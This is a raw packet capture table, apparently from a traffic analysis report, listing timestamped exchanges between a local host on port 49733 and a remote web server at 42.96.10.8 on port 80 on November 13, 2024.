                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291229010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291233063 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291238070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291248083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291258097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291269064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291280031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291292906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291294098 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291294098 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291306019 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291320086 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291331053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291340113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291352034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291353941 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291361094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291383028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291389942 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291389942 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291412115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291420937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291429996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291440010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291450024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291452885 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291452885 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291457891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291467905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291486979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291503906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291508913 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291508913 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291508913 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291513920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291523933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291533947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291542053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291552067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291560888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291563034 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291563034 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291569948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291579962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291589975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291591883 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291591883 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291599989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291640043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291656017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291660070 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291660070 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291665077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291675091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291683912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291693926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291706085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291714907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291726112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291747093 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291747093 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291747093 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291760921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291771889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291780949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291790962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291800022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291810989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291815042 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291815042 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291820049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291830063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291840076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291850090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291851997 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291852951 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291861057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291870117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291881084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291892052 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291902065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291904926 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291904926 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291954994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291982889 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291982889 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292012930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292033911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292045116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292053938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292064905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292079926 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292105913 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292105913 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292285919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292391062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292399883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292408943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292418957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292431116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292445898 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292459965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292470932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292479992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292490005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292500973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292511940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292515993 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292515993 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292521000 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292548895 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292551994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292562962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292572975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292584896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292594910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292596102 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292596102 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292617083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292627096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292628050 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292628050 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292637110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292646885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292682886 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292685986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292695999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292706013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292716980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292726994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292752981 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292752981 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292752981 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292764902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292776108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292784929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292795897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292807102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292845011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292855024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292855024 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292855024 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292865038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292875051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292885065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292912960 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292912960 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292916059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292926073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.292934895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293080091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293090105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293098927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293122053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293135881 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293143988 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293144941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293167114 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293173075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293181896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293191910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293200970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293214083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293224096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293226957 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293226957 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293234110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293251991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293267012 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293273926 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293273926 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293276072 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293286085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293312073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293313980 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293313980 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293323994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293333054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293344975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293354988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293365002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293366909 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293366909 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293421030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293431997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293435097 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293441057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293452024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293462992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293473005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293493986 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293497086 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293508053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293510914 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293519020 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293529987 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293550968 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293550968 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293895006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293905973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293915033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.293991089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294002056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294012070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294014931 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294023037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294123888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294135094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294145107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294157028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294157028 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294157028 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294167042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294177055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294178009 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294188976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294198990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294209957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294210911 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294210911 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294219971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294294119 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294305086 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294316053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294392109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294408083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294409037 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294409037 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294418097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294429064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294450998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294461966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294471025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294480085 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294480085 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294497967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294508934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294517994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294522047 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294522047 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294527054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294549942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294562101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294570923 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294572115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294593096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294601917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294610977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294621944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294640064 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294640064 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294641972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294657946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294660091 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294693947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294703960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294713020 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294781923 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.294781923 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295094967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295105934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295114994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295125008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295135021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295145035 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295166969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295181990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295183897 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295183897 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295183897 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295205116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295214891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295222998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295228958 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295238018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295249939 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295262098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295267105 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295272112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295280933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295289993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295300961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295316935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295325994 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295325994 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295325994 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295326948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295336962 CET804973342.96.10.8192.168.2.4
